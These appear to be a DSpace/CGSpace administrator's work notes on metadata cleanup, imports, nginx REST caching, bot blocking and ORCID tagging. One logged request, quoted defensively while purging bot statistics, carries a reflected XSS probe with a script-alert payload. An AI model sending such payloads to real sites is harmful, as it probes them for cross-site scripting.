localhost/dspacetest= ☘ \COPY (SELECT DISTINCT text_value AS "dcterms.subject", count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id = 187 GROUP BY "dcterms.subject" ORDER BY count DESC) to /tmp/2022-08-20-agrovoc.csv WITH CSV HEADER;
COPY 21685
$ csvcut -c 1 /tmp/2022-08-20-agrovoc.csv | sed 1d > /tmp/all-subjects.txt
$ ./ilri/agrovoc-lookup.py -i /tmp/all-subjects.txt -o 2022-08-20-all-subjects-results.csv
$ csvgrep -c 'number of matches' -m 0 -i /tmp/2022-08-20-all-subjects-results.csv.bak | csvcut -c 1 | sed 1d > /tmp/agrovoc-subjects.txt
$ wc -l /tmp/agrovoc-subjects.txt
11834 /tmp/agrovoc-subjects.txt
```
- Then I created a new column joining the title and abstract, and ran the Jython expression above against this new file with 11,000 AGROVOC terms
- Then I joined that column with Peter's `dcterms.subject` column and then deduplicated it with this Jython:
```console
res = []
[res.append(x) for x in value.split("||") if x not in res]
return "||".join(res)
```
- This is way better, but you end up getting a bunch of countries, regions, and short words like "gates" matching in AGROVOC that are inappropriate (we typically don't tag these in AGROVOC) or incorrect (gates, as in windows or doors, not the funding agency)
- I did a text facet in OpenRefine and removed a bunch of these by eye
- Then I finished adding the `dcterms.relation` and CRP metadata flagged by Peter on the Gender presentations
- I'm waiting for him to send me the PDFs and then I will upload them to DSpace Test
## 2022-08-21
- Start indexing on AReS
- The load on CGSpace was around 5.0 today, and now that I started the harvesting it's over 10 for an hour now, sigh...
- I'm going to try an experiment to block Googlebot, bingbot, and Yandex for a week to see if the load goes down
## 2022-08-22
- I tried to re-generate the SAF bundle for the MARLO Innovations after improving the AGROVOC subjects and the v3 PDFs, but six are missing from the v3 zip that are present in the original zip:
- ProjectInnovationSummary-WLE-P500-I78.pdf
- ProjectInnovationSummary-WLE-P452-I699.pdf
- ProjectInnovationSummary-WLE-P518-I696.pdf
- ProjectInnovationSummary-WLE-P442-I740.pdf
- ProjectInnovationSummary-WLE-P516-I647.pdf
- ProjectInnovationSummary-WLE-P438-I585.pdf
- I downloaded them manually using the URLs in the original CSV
- I also uploaded a new version of the MELIAs to DSpace Test
## 2022-08-23
- Checking the number of items on CGSpace so we can keep an eye on the 100,000 number:
```console
dspace=# SELECT COUNT(uuid) FROM item WHERE in_archive='t';
count
-------
95716
(1 row)
```
- If I check OAI I see more, but perhaps that counts mapped items multiple times
- Peter said the 303 Gender PPTs were good to go, so I updated the collection mappings and IDs in OpenRefine and then uploaded them to CGSpace:
```console
$ dspace import --add --eperson=fuu@fuu.com --source /tmp/SimpleArchiveFormat --mapfile=./2022-08-23-gender-ppts.map
```
- I created a [GitHub issue for OpenRXV compatibility issues with DSpace 7](https://github.com/ilri/OpenRXV/issues/133)
## 2022-08-24
- Start working on the MARLO OICRs
- First I extracted the filenames and IDs from the v2 metadata file, then joined it with the UTF-8 version:
```console
$ xsv select 'cg.number (series/report No.),File' OICRS\ Metadata\ v2.csv > /tmp/OICR-files.csv
$ xsv join --left 'cg.number (series/report No.)' OICRS\ metadata\ utf8\ 20220816_JM.csv 'cg.number (series/report No.)' /tmp/OICR-files.csv > OICRs-UTF-8-with-files.csv
```
- After that I imported it into OpenRefine for data cleaning
- To enrich the metadata I combined the title and abstract into a new field and then checked my list of 11,000 AGROVOC terms against it
- First, create a new column with this GREL:
```console
cells["dc.title"].value + " " + cells["dcterms.abstract"].value
```
- Then use this Jython:
```python
import re
with open(r"/tmp/agrovoc-subjects.txt",'r') as f :
terms = [name.rstrip().lower() for name in f]
return "||".join([term for term in terms if re.match(r".*\b" + term + r"\b.*", value.lower())])
```
- After that I de-duplicated the terms using this Jython:
```python
res = []
[res.append(x) for x in value.split("||") if x not in res]
return "||".join(res)
```
- Then I split the multi-values on "||" and used a text facet to remove some countries and other nonsense terms that matched, like "gates" and "al" and "s"
- Then I did the same for countries
- Then I exported the CSV and started searching for duplicates so that I can add them as relations:
```console
$ ./ilri/check-duplicates.py -i ~/Downloads/2022-08-24-OICRs.csv -u dspace -db dspace -p 'omg' -o /tmp/oicrs-matches.csv
```
- Oh wow, I actually found one OICR already uploaded to CGSpace... I have to ask Jose about that
## 2022-08-25
- I started processing the MARLO Policies in OpenRefine, similar to the Innovations, MELIAs, and OICRs above
- I also re-ran the AGROVOC matching on Innovations because my technique has improved since I ran it a few weeks ago
## 2022-08-29
- Start a harvest on AReS
- Meeting with Peter and Abenet about CGSpace issues
- I mapped the one MARLO OICR duplicate from the CCAFS Reports collection and deleted it from the OICRs CSV
## 2022-08-30
- Manuel from the "Alianza SIDALC" in South America contacted me asking for permission to harvest CGSpace and include our content in their system
- I responded that we would be glad if they harvested us, and that they should use a useful user agent so we can contact them incase of any issues or changes on the server
- I emailed ILRI ICT to ask how Abenet and I can use the CGSpace Support email address in our email applications because we haven't checked that account in years
- I tried to log in on office365.com but it gave an error
- I got access to the account and cleaned up the inbox, unsubscribed from a bunch of Microsoft and Yammer feeds, etc
- Remind Dani, Tariku, and Andrea about the legacy links that we want to update on ILRI's website:
- http://mahider.ilri.org → https://cgspace.cgiar.org
- http://mahider.ilri.org/handle/10568/xxxxx → https://hdl.handle.net/10568/xxxxx
- http://www.ilri.org/ilrinews/index.php/archives/xxxx → https://newsarchive.ilri.org/archives/xxxx
- Join the MARLO OICRs with their relations that I processed a few days ago (minus the second id column and some others):
```console
$ xsv join --left id ~/Downloads/2022-08-24-OICRs.csv id ~/Downloads/oicrs-matches-csv.csv | xsv select '!id[1],Your Title,Their Title,Similarity,Your Date,Their Date,datediff' > /tmp/oicrs-with-relations.csv
```
- Then I cleaned them with csv-metadata-quality to catch some duplicates, add regions, etc and re-imported to OpenRefine
- I flagged a few duplicates for Jose and he'll let me know what to do with them
- I imported the OICRs to DSpace Test:
```console
$ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx2048m"
$ dspace import --add --eperson=fuuuu@fuuu.com --source /tmp/SimpleArchiveFormat-oicrs --mapfile=./2022-08-30-OICRs.map
```
- Meeting with Marie-Angelique, Abenet, Valentina, Sara, and Margarita about Types
- I am testing the `org.apache.cocoon.uploads.autosave=false` setting for XMLUI so that files posted via multi-part forms get memory mapped instead of written to disk
- Check the MARLO Policies for relations and join them with the main CSV file:
```console
$ ./ilri/check-duplicates.py -i ~/Downloads/2022-08-25-Policies-UTF-8-With-Files.csv -u dspace -db dspace -p 'fuui' -o /tmp/policies-matches.csv
$ xsv join --left id ~/Downloads/2022-08-25-Policies-UTF-8-With-Files.csv id /tmp/policies-matches.csv | xsv select '!id[1],Your Title,Their Title,Similarity,Your Date,Their Date' > /tmp/policies-with-relations.csv
```
<!-- vim: set sw=2 ts=2: -->

574
content/posts/2022-09.md Normal file
View File

@ -0,0 +1,574 @@
---
title: "September, 2022"
date: 2022-09-01T09:41:36+03:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2022-09-01
- A bit of work on the "Mapping CG CoreCGSpaceMELMARLO Types" spreadsheet
- I tested an item submission on DSpace Test with the Cocoon `org.apache.cocoon.uploads.autosave=false` change
- The submission works as expected
- Start debugging some region-related issues with csv-metadata-quality
- I created a new test file `test-geography.csv` with some different scenarios
- I also fixed a few bugs and improved the region-matching logic
<!--more-->
- I filed [an issue for the "South-eastern Asia" case mismatch in country_converter](https://github.com/konstantinstadler/country_converter/issues/115) on GitHub
- Meeting with Moayad to discuss OpenRXV developments
- He demoed his new multiple dashboards feature and I helped him rebase those changes to master so we can test them more
## 2022-09-02
- I worked a bit more on exclusion and skipping logic in csv-metadata-quality
- I also pruned and updated all the Python dependencies
- Then I released [version 0.6.0](https://github.com/ilri/csv-metadata-quality/releases/tag/v0.6.0) now that the excludes and region matching support is working way better
## 2022-09-05
- Started a harvest on AReS last night
- Looking over the Solr statistics from last month I see many user agents that look suspicious:
- Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0E; .NET4.0C)
- Mozilla / 5.0(Windows NT 10.0; Win64; x64) AppleWebKit / 537.36(KHTML, like Gecko) Chrome / 77.0.3865.90 Safari / 537.36
- Mozilla/5.0 (Windows NT 10.0; WOW64; Rv:50.0) Gecko/20100101 Firefox/50.0
- Mozilla/5.0 (X11; Linux i686; rv:2.0b12pre) Gecko/20110204 Firefox/4.0b12pre
- Mozilla/5.0 (Windows NT 10.0; Win64; x64; Xbox; Xbox One) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Edge/44.18363.8131
- Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
- Mozilla/4.0 (compatible; MSIE 4.5; Windows 98;)
- curb
- bitdiscovery
- omgili/0.5 +http://omgili.com
- Mozilla/5.0 (compatible)
- Vizzit
- Mozilla/5.0 (Windows NT 5.1; rv:52.0) Gecko/20100101 Firefox/52.0
- Mozilla/5.0 (Android; Mobile; rv:13.0) Gecko/13.0 Firefox/13.0
- Java/17-ea
- AdobeUxTechC4-Async/3.0.12 (win32)
- ZaloPC-win32-24v473
- Mozilla/5.0/Firefox/42.0 - nbertaupete95(at)gmail.com
- Scoop.it
- Mozilla/5.0 (Windows NT 6.1; rv:27.0) Gecko/20100101 Firefox/27.0
- Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
- ows NT 10.0; WOW64; rv: 50.0) Gecko/20100101 Firefox/50.0
- WebAPIClient
- Mozilla/5.0 Firefox/26.0
- Mozilla/5.0 (compatible; woorankreview/2.0; +https://www.woorank.com/)
- For example, some are apparently using versions of Firefox that are over ten years old, and some are obviously trying to look like valid user agents, but making typos (`Mozilla / 5.0`)
- Tons of hosts making requests likt this:
```console
GET /bitstream/handle/10568/109408/Milk%20testing%20lab%20protocol.pdf?sequence=1&isAllowed=\x22><script%20>alert(String.fromCharCode(88,83,83))</script> HTTP/1.1" 400 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Rv:50.0) Gecko/20100101 Firefox/50.0
```
- I got a list of hosts making requests like that so I can purge their hits:
```console
# zcat /var/log/nginx/{access,library-access,oai,rest}.log.[123]*.gz | grep 'String.fromCharCode(' | awk '{print $1}' | sort -u > /tmp/ips.txt
```
- I purged 4,718 hits from IPs
- I see some new Hetzner ranges that I hadn't blocked yet apparently?
- I got a [list of Hetzner's IPs from IP Quality Score](https://www.ipqualityscore.com/asn-details/AS24940/hetzner-online-gmbh) then added them to the existing ones in my Ansible playbooks:
```console
$ awk '{print $1}' /tmp/hetzner.txt | wc -l
36
$ sort -u /tmp/hetzner-combined.txt | wc -l
49
```
- I will add this new list to nginx's `bot-networks.conf` so they get throttled on scraping XMLUI and get classified as bots in Solr statistics
- Then I purged hits from the following user agents:
```console
$ ./ilri/check-spider-hits.sh -f /tmp/agents
Found 374 hits from curb in statistics
Found 350 hits from bitdiscovery in statistics
Found 564 hits from omgili in statistics
Found 390 hits from Vizzit in statistics
Found 9125 hits from AdobeUxTechC4-Async in statistics
Found 97 hits from ZaloPC-win32-24v473 in statistics
Found 518 hits from nbertaupete95 in statistics
Found 218 hits from Scoop.it in statistics
Found 584 hits from WebAPIClient in statistics
Total number of hits from bots: 12220
```
- Then I will add these user agents to the ILRI spider override in DSpace
## 2022-09-06
- I'm testing dspace-statistics-api with our DSpace 7 test server
- After setting up the env and the database the `python -m dspace_statistics_api.indexer` runs without issues
- While playing with Solr I tried to search for statistics from this month using `time:2022-09*` but I get this error: "Can't run prefix queries on numeric fields"
- I guess that the syntax in Solr changed since 4.10...
- This works, but is super annoying: `time:[2022-09-01T00:00:00Z TO 2022-09-30T23:59:59Z]`
## 2022-09-07
- I tested the controlled-vocabulary changes on DSpace 6 and they work fine
- Last week I found that DSpace 7 is more strict with controlled vocabularies and requires IDs for all node values
- This is a pain because it means I have to re-do the IDs in each file every time I update them
- If I add `id="0000"` to each, then I can use [this vim expression](https://vim.fandom.com/wiki/Making_a_list_of_numbers#Substitute_with_ascending_numbers) `let i=0001 | g/0000/s//\=i/ | let i=i+1` to replace the numbers with increments starting from 1
- Meeting with Marie Angelique, Abenet, Sarа, аnd Margarita to continue the discussion about Types from last week
- We made progress with concrete actions and will continue next week
## 2022-09-08
- I had a meeting with Nicky from UNEP to discuss issues they are having with their DSpace
- I told her about the meeting of DSpace community people that we're planning at ILRI in the next few weeks
## 2022-09-09
- Add some value mappings to AReS because I see a lot of incorrect regions and countries
- I also found some values that were blank in CGSpace so I deleted them:
```console
dspace=# BEGIN;
BEGIN
dspace=# DELETE FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_value='';
DELETE 70
dspace=# COMMIT;
COMMIT
```
- Start a full Discovery index on CGSpace to catch these changes in the Discovery
## 2022-09-11
- Today is Sunday and I see the load on the server is high
- Google and a bunch of other bots have been blocked on XMLUI for the past two weeks so it's not from them!
- Looking at the top IPs this morning:
```console
# cat /var/log/nginx/{access,library-access,oai,rest}.log /var/log/nginx/{access,library-access,oai,rest}.log.1 | grep '11/Sep/2022' | awk '{print $1}' | sort | uniq -c | sort -h | tail -n 40
...
165 64.233.172.79
166 87.250.224.34
200 69.162.124.231
202 216.244.66.198
385 207.46.13.149
398 207.46.13.147
421 66.249.64.185
422 157.55.39.81
442 2a01:4f8:1c17:5550::1
451 64.124.8.36
578 137.184.159.211
597 136.243.228.195
1185 66.249.64.183
1201 157.55.39.80
3135 80.248.237.167
4794 54.195.118.125
5486 45.5.186.2
6322 2a01:7e00::f03c:91ff:fe9a:3a37
9556 66.249.64.181
```
- The top is still Google, but all the requests are HTTP 503 because I classified them as bots for XMLUI at least
- Then there's 80.248.237.167, which is using a normal user agent and scraping Discovery
- That IP is on Internet Vikings aka Internetbolaget and we are already marking that subnet as 'bot' for XMLUI so most of these requests are HTTP 503
- On another note, I'm curious to explore enabling caching of certain REST API responses
- For example, where the use is for harvesting rather than actual clients getting bitstreams or thumbnails, it seems there might be a benefit to speeding these up for subsequent requestors:
```console
# awk '{print $7}' /var/log/nginx/rest.log | grep -v retrieve | sort | uniq -c | sort -h | tail -n 10
4 /rest/items/3f692ddd-7856-4bf0-a587-99fb3df0688a/bitstreams
4 /rest/items/3f692ddd-7856-4bf0-a587-99fb3df0688a/metadata
4 /rest/items/b014e36f-b496-43d8-9148-cc9db8a6efac/bitstreams
4 /rest/items/b014e36f-b496-43d8-9148-cc9db8a6efac/metadata
5 /rest/handle/10568/110310?expand=all
5 /rest/handle/10568/89980?expand=all
5 /rest/handle/10568/97614?expand=all
6 /rest/handle/10568/107086?expand=all
6 /rest/handle/10568/108503?expand=all
6 /rest/handle/10568/98424?expand=all
```
- I specifically have to not cache things like requests for bitstreams because those are from actual users and we need to keep the real requests so we get the statistics hit
- Will be interesting to check the results above as the day goes on (now 10AM)
- To estimate the potential savings from caching I will check how many non-bitstream requests are made versus how many are made more than once (updated the next morning using yesterday's log):
```console
# awk '{print $7}' /var/log/nginx/rest.log.1 | grep -v retrieve | sort -u | wc -l
33733
# awk '{print $7}' /var/log/nginx/rest.log.1 | grep -v retrieve | sort | uniq -c | awk '$1 > 1' | wc -l
5637
```
- In the afternoon I started a harvest on AReS (which should affect the numbers above also)
- I enabled an nginx proxy cache on DSpace Test for this location regex: `location ~ /rest/(handle|items|collections|communities)/.+`
## 2022-09-12
- I am testing harvesting DSpace Test via AReS with the nginx proxy cache enabled
- I had to tune the regular expression in nginx a bit because the REST requests OpenRXV uses weren't matching
- Now I'm trying this one: `/rest/(handle|items|collections|communities)/?`
- Testing in [regex101.com](https://regex101.com/r/vPz11y/1) with this test string:
```
/rest/handle/10568/27611
/rest/items?expand=metadata,parentCommunityList,parentCollectionList,bitstreams&limit=10&offset=36270
/rest/handle/10568/110310?expand=all
/rest/rest/bitstreams/28926633-c7c2-49c2-afa8-6d81cadc2316/retrieve
/rest/bitstreams/15412/retrieve
/rest/items/083dbb0d-11e2-4dfe-902b-eb48e4640d04/metadata
/rest/items/083dbb0d-11e2-4dfe-902b-eb48e4640d04/bitstreams
/rest/collections/edea23c0-0ebd-4525-90b0-0b401f997704/items
/rest/items/14507941-aff2-4d57-90bd-03a0733ad859/metadata
/rest/communities/b38ea726-475f-4247-a961-0d0b76e67f85/collections
/rest/collections/e994c450-6ff7-41c6-98df-51e5c424049e/items?limit=10000
```
- I estimate that it will take about 1GB of cache to harvest 100,000 items from CGSpace with OpenRXV (10,000 pages)
- Basically all but 4 and 5 (bitstreams) should match
- Upload 682 OICRs from MARLO to CGSpace
- We had tested these on DSpace Test last month along with the MELIAs, Policies, and Innovations, but we decided to upload the OICRs first so that other things can link against them as related items
## 2022-09-14
- Meeting with Peter, Abenet, Indira, and Michael about CGSpace rollout plan for the Initiatives
## 2022-09-16
- Meeting with Marie-Angeqlique, Abenet, Margarita, and Sara about types for CG Core
- We are about halfway through the list of types now, with concrete actions for CG Core and CGSpace
- We will meet next in two weeks to hopefully finalize the list, then we can move on to definitions
## 2022-09-18
- Deploy the `org.apache.cocoon.uploads.autosave=false` change on CGSpace
- Start a harvest on AReS
## 2022-09-19
- Deploy the nginx proxy cache for /rest requests on CGSpace
- I had tested this last week on DSpace Test
- By my counts on CGSpace yesterday (Sunday, a busy day for the REST API), we had 5,654 URLs that were requested more than twice, and it tails off after that towards two, three, four, etc:
```console
# awk '{print $7}' /var/log/nginx/rest.log.1 | grep -v retrieve | sort | uniq -c | awk '$1 > 1' | wc -l
5654
# awk '{print $7}' /var/log/nginx/rest.log.1 | grep -v retrieve | sort | uniq -c | awk '$1 == 2' | wc -l
4710
# awk '{print $7}' /var/log/nginx/rest.log.1 | grep -v retrieve | sort | uniq -c | awk '$1 == 3' | wc -l
814
# awk '{print $7}' /var/log/nginx/rest.log.1 | grep -v retrieve | sort | uniq -c | awk '$1 == 4' | wc -l
86
# awk '{print $7}' /var/log/nginx/rest.log.1 | grep -v retrieve | sort | uniq -c | awk '$1 == 5' | wc -l
39
```
- For now I guess requests that were done two or three times by different clients will be cached and that's a win, and I expect more and more REST API activity soon when initiatives and One CGIAR stuff picks up
## 2022-09-20
- I checked the status of the nginx REST API cache on CGSpace and it was stuck at 7,083 items for hours:
```console
# find /var/cache/nginx/rest_cache/ -type f | wc -l
7083
```
- The proxy cache key zone is currently 1m, which can store ~8,000 keys, so that could be what we're running into
- I increased it to 2m and will keep monitoring it
- CIP webmaster contacted me to say they are having problems harvesting CGSpace from their WordPress
- I am not sure if there are issues due to the REST API caching I enabled...
## 2022-09-21
- Planning the Nairobi DSpace Users meeting with Abenet
- Planning to have a call about MEL submitting to CGSpace on Monday with Mohammed Salem
- I created two collections on DSpace Test: one with a workflow, and one without
- According to my notes from [2020-10]({{< relref "2020-10.md" >}}) the account must be in the admin group in order to submit via the REST API, so I added it to the admin group of each collection
## 2022-09-22
- Nairobi DSpace users meeting at ILRI
- I found a few users that didn't have ORCID iDs and were missing tags on CGSpace so I tagged them:
```console
dc.contributor.author,cg.creator.identifier
dc.contributor.author,cg.creator.identifier
"Alonso, Silvia","Silvia Alonso: 0000-0002-0565-536X"
"Goopy, John P.","John Goopy: 0000-0001-7177-1310"
"Korir, Daniel","Daniel Korir: 0000-0002-1356-8039"
"Leitner, Sonja","Sonja Leitner: 0000-0002-1276-8071"
"Fèvre, Eric M.","Eric M. Fèvre: 0000-0001-8931-4986"
"Galiè, Alessandra","Alessandra Galie: 0000-0001-9868-7733"
"Baltenweck, Isabelle","Isabelle Baltenweck: 0000-0002-4147-5921"
"Robinson, Timothy P.","Timothy Robinson: 0000-0002-4266-963X"
"Lannerstad, Mats","Mats Lannerstad: 0000-0002-5116-3198"
"Graham, Michael","Michael Graham: 0000-0002-1189-8640"
"Merbold, Lutz","Lutz Merbold: 0000-0003-4974-170X"
"Rufino, Mariana C.","Mariana Rufino: 0000-0003-4293-3290"
"Wilkes, Andreas","Andreas Wilkes: 0000-0001-7546-991X"
"van der Weerden, T.","Tony van der Weerden: 0000-0002-6999-2584"
"Vermeulen, S.","Sonja Vermeulen: 0000-0001-6242-9513"
"Vermeulen, Sonja","Sonja Vermeulen: 0000-0001-6242-9513"
"Vermeulen, Sonja J.","Sonja Vermeulen: 0000-0001-6242-9513"
"Hung Nguyen-Viet","Hung Nguyen-Viet: 0000-0003-1549-2733"
"Herrero, Mario T.","Mario Herrero: 0000-0002-7741-5090"
"Thornton, Philip K.","Philip Thornton: 0000-0002-1854-0182"
"Duncan, Alan J.","Alan Duncan: 0000-0002-3954-3067"
"Lukuyu, Ben A.","Ben Lukuyu: 0000-0002-9374-3553"
"Lindahl, Johanna F.","Johanna Lindahl: 0000-0002-1175-0398"
"Okeyo Mwai, Ally","Ally Okeyo Mwai: 0000-0003-2379-7801"
"Wieland, Barbara","Barbara Wieland: 0000-0003-4020-9186"
"Omore, Amos O.","Amos Omore: 0000-0001-9213-9891"
"Randolph, Thomas F.","Thomas Fitz Randolph: 0000-0003-1849-9877"
"Staal, Steven J.","Steven Staal: 0000-0002-1244-1773"
"Hanotte, Olivier H.","Olivier Hanotte: 0000-0002-2877-4767"
"Dessie, Tadelle","Tadelle Dessie: 0000-0002-1630-0417"
"Dione, Michel M.","Michel Dione: 0000-0001-7812-5776"
"Gebremedhin, Berhanu","Berhanu Gebremedhin: 0000-0002-3168-2783"
"Ouma, Emily A.","Emily Ouma: 0000-0002-3123-1376"
"Roesel, Kristina","Kristina Roesel: 0000-0002-2553-1129"
"Bishop, Richard P.","Richard Bishop: 0000-0002-3720-9970"
"Lapar, Ma. Lucila","Ma. Lucila Lapar: 0000-0002-4214-9845"
"Rich, Karl M.","Karl Rich: 0000-0002-5581-9553"
"Hoekstra, Dirk","Dirk Hoekstra: 0000-0002-6111-6627"
"Nene, Vishvanath","Vishvanath Nene: 0000-0001-7066-4169"
"Patel, S.P.","Sonal Henson: 0000-0002-2002-5462"
"Hanson, Jean","Jean Hanson: 0000-0002-3648-2641"
"Marshall, Karen","Karen Marshall: 0000-0003-4197-1455"
"Notenbaert, An Maria Omer","An Maria Omer Notenbaert: 0000-0002-6266-2240"
"Ojango, Julie M.K.","Ojango J.M.K.: 0000-0003-0224-5370"
"Wijk, Mark T. van","Mark van Wijk: 0000-0003-0728-8839"
"Tarawali, Shirley A.","Shirley Tarawali: 0000-0001-9398-8780"
"Naessens, Jan","Jan Naessens: 0000-0002-7075-9915"
"Butterbach-Bahl, Klaus","Klaus Butterbach-Bahl: 0000-0001-9499-6598"
"Poole, Elizabeth J.","Elizabeth Jane Poole: 0000-0002-8570-794X"
"Mulema, Annet A.","Annet Mulema: 0000-0003-4192-3939"
"Dror, Iddo","Iddo Dror: 0000-0002-0800-7456"
"Ballantyne, Peter G.","Peter G. Ballantyne: 0000-0001-9346-2893"
"Baker, Derek","Derek Baker: 0000-0001-6020-6973"
"Ericksen, Polly J.","Polly Ericksen: 0000-0002-5775-7691"
"Jones, Christopher S.","Chris Jones: 0000-0001-9096-9728"
"Mude, Andrew G.","Andrew Mude: 0000-0003-4903-6613"
"Puskur, Ranjitha","Ranjitha Puskur: 0000-0002-9112-3414"
"Kiara, Henry K.","Henry Kiara: 0000-0001-9578-1636"
"Gibson, John P.","John Gibson: 0000-0003-0371-2401"
"Flintan, Fiona E.","Fiona Flintan: 0000-0002-9732-097X"
"Mrode, Raphael A.","Raphael Mrode: 0000-0003-1964-5653"
"Mtimet, Nadhem","Nadhem Mtimet: 0000-0003-3125-2828"
"Said, Mohammed Yahya","Mohammed Yahya Said: 0000-0001-8127-6399"
"Pezo, Danilo A.","Danilo Pezo: 0000-0001-5345-5314"
"Haileslassie, Amare","Amare Haileslassie: 0000-0001-5237-9006"
"Wright, Iain A.","Iain Wright: 0000-0002-6216-5308"
"Cadilhon, Joseph J.","Jean-Joseph Cadilhon: 0000-0002-3181-5136"
"Domelevo Entfellner, Jean-Baka","Jean-Baka Domelevo Entfellner: 0000-0002-8282-1325"
"Oyola, Samuel O.","Samuel O. Oyola: 0000-0002-6425-7345"
"Agaba, M.","Morris Agaba: 0000-0001-6777-0382"
"Beebe, Stephen E.","Stephen E Beebe: 0000-0002-3742-9930"
"Ouso, Daniel","Daniel Ouso: 0000-0003-0994-2558"
"Ouso, Daniel O.","Daniel Ouso: 0000-0003-0994-2558"
"Rono, Gilbert K.","Gilbert Kibet-Rono: 0000-0001-8043-5423"
"Kibet, Gilbert","Gilbert Kibet-Rono: 0000-0001-8043-5423"
"Juma, John","John Juma: 0000-0002-1481-5337"
"Juma, J.","John Juma: 0000-0002-1481-5337"
$ ./ilri/add-orcid-identifiers-csv.py -i /tmp/2022-09-22-add-orcids.csv -db dspace -u dspace -p 'fuuu'
```
- This adds nearly 5,500 ORCID tags!
- Some of these authors were not in the controlled vocabulary so I added them
## 2022-09-23
- Tag some more ORCID metdata (amended above)
- Meeting with Peter and Abenet to discuss CGSpace issues
- We found a workable solution to the MEL submission issue: they can submit to a dedicated MEL-only collection with no workflow and we will map or move the items after
- Pascal says that they have made a [pull request for their duplicate checker on DSpace 7](https://github.com/DSpace/DSpace/pull/8415) yayyyy
## 2022-09-24
- Found some more ORCID identifiers to tag so I added them to the list above
- Start a harvest on AReS around 8PM on Saturday night
## 2022-09-25
- The harvest on AReS finished and now the load on CGSpace server is still high like always on Sunday mornings
- UptimeRobot says it's down sigh...
- I had an idea to include the HTTP Accept header in the nginx proxy cache key to fix the issue we had with CIP last week
- It seems to work:
```
$ http --print Hh 'https://dspacetest.cgiar.org/rest/items?expand=metadata,parentCommunityList,parentCollectionList,bitstreams&limit=10&offset=60'
...
Content-Type: application/json
X-Cache-Status: MISS
$ http --print Hh 'https://dspacetest.cgiar.org/rest/items?expand=metadata,parentCommunityList,parentCollectionList,bitstreams&limit=10&offset=60'
...
Content-Type: application/json
X-Cache-Status: HIT
$ http --print Hh 'https://dspacetest.cgiar.org/rest/items?expand=metadata,parentCommunityList,parentCollectionList,bitstreams&limit=10&offset=60' Accept:application/xml
...
Content-Type: application/xml
X-Cache-Status: MISS
$ http --print Hh 'https://dspacetest.cgiar.org/rest/items?expand=metadata,parentCommunityList,parentCollectionList,bitstreams&limit=10&offset=60' Accept:application/xml
...
Content-Type: application/xml
X-Cache-Status: HIT
```
- This effectively makes our cache half as effective, but hopefully as more people start harvesting the number of requests handled by it will go up
- I will enable this on CGSpace and email Moises from CIP to check if their harvester is working
## 2022-09-26
- Update welcome text on CGSpace after our meeting last week
- I found another dozen or so ORCIDs for top authors on ILRI's community on CGSpace and tagged them (~1,100 more metadata fields)
- Last week we discussed moving `cg.identifier.googleurl` to `cg.identifier.url` since there is no need to treat Google Books URLs specially anymore as far as we know
- I made the changes to the submission form and the XMLUI item displays, then moved all existing metadata in PostgreSQL:
```console
dspace= ☘ UPDATE metadatavalue SET metadata_field_id=219 WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=222;
UPDATE 1137
```
- Then I deleted `cg.identifier.googleurl` from the metadata registry
- Meeting with Salem, Svetlana, Valentina, and Abenet about MEL depositing to CGSpace for the initiatives
- Submitting to a collection without a workflow works as expected, and we can even select another collection (with a workflow) to map the item to from the MEL submission
- The three minor issues we found were:
- MEL still doesn't send the bitstream
- MEL sends metadata with a download URL on mel.cgiar.org
- MEL sends a JPEG that says "no thumbnail" when an item doesn't have a thumbnail
- I still need to send feedback to the group
## 2022-09-27
- Find a few more ORCID identifiers missing for ILRI authors and add them to the controlled vocabulary and tag the authors on CGSpace
- Moises from CIP says the WordPress importer worked fine with the current nginx proxy cache settings so it seems adding the HTTP Accept header to the cache key worked
- Update my DSpace 7 environments to 7.4-SNAPSHOT
- I see they have added thumbnails in some places now
- Oh nice, they also added the "recent submissions" to the home page
- While talking with Salem about the MEL depositing to CGSpace we discovered an issue with HTTP DELETE on `/items/{item id}/bitstreams/{bitstream id}` or `/bitstreams/{bitstream id}`
- DSpace removes the bitstream but keeps the empty `THUMBNAIL` bundle, which breaks the display in XMLUI
- Meeting with Enrico et al about PRMS reporting for the initiatives
## 2022-09-28
- I was reading the source code for DSpace 6's REST API and found that it's [not possible to specify a bundle while POSTing a bitstream](https://github.com/DSpace/DSpace/blob/dspace-6.4/dspace-rest/src/main/java/org/dspace/rest/ItemsResource.java#L427)
- I asked Salem how they do it on MEL and he said they pretend to be a human and do it via XMLUI!
- I added a few new ILRI subjects to the input forms on CGSpace
- Both "bushmeat" and "wildlife conservation" are AGROVOC terms, but "wild meat" is not
- The distinction ILRI would like to start making is:
> Meat comes from any animal, and when at ILRI we specifically make
> reference to it in the context of livestock. However the word bushmeat
> refers to illegal harvesting of meat. wild meat is being used as legal
> harvesting of meat from wildlife and not from livestock.
- I added a few more CGIAR authors ORCID identifiers to our controlled vocabulary and tagged them on CGSpace (~450 more metadata fields)
- Talking to Salem about ORCID identifiers, we compared list and they have a bunch that we don't have:
```console
$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-identifier.xml ~/Downloads/MEL_ORCID_2022-09-28.csv | \
grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | \
sort | \
uniq > /tmp/2022-09-29-combined-orcids.txt
$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-identifier.xml | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq | wc -l
1421
$ wc -l /tmp/2022-09-29-combined-orcids.txt
1905 /tmp/2022-09-29-combined-orcids.txt
```
- After combining them I ran them through my `resolve-orcids.py` script:
```console
$ ./ilri/resolve-orcids.py -i /tmp/2022-09-29-combined-orcids.txt -o /tmp/2022-09-29-combined-orcids-names.txt -d
```
- I wrote a script `update-orcids.py` to read a list of names and ORCID identifiers and update existing metadata in the database to the latest name format
```console
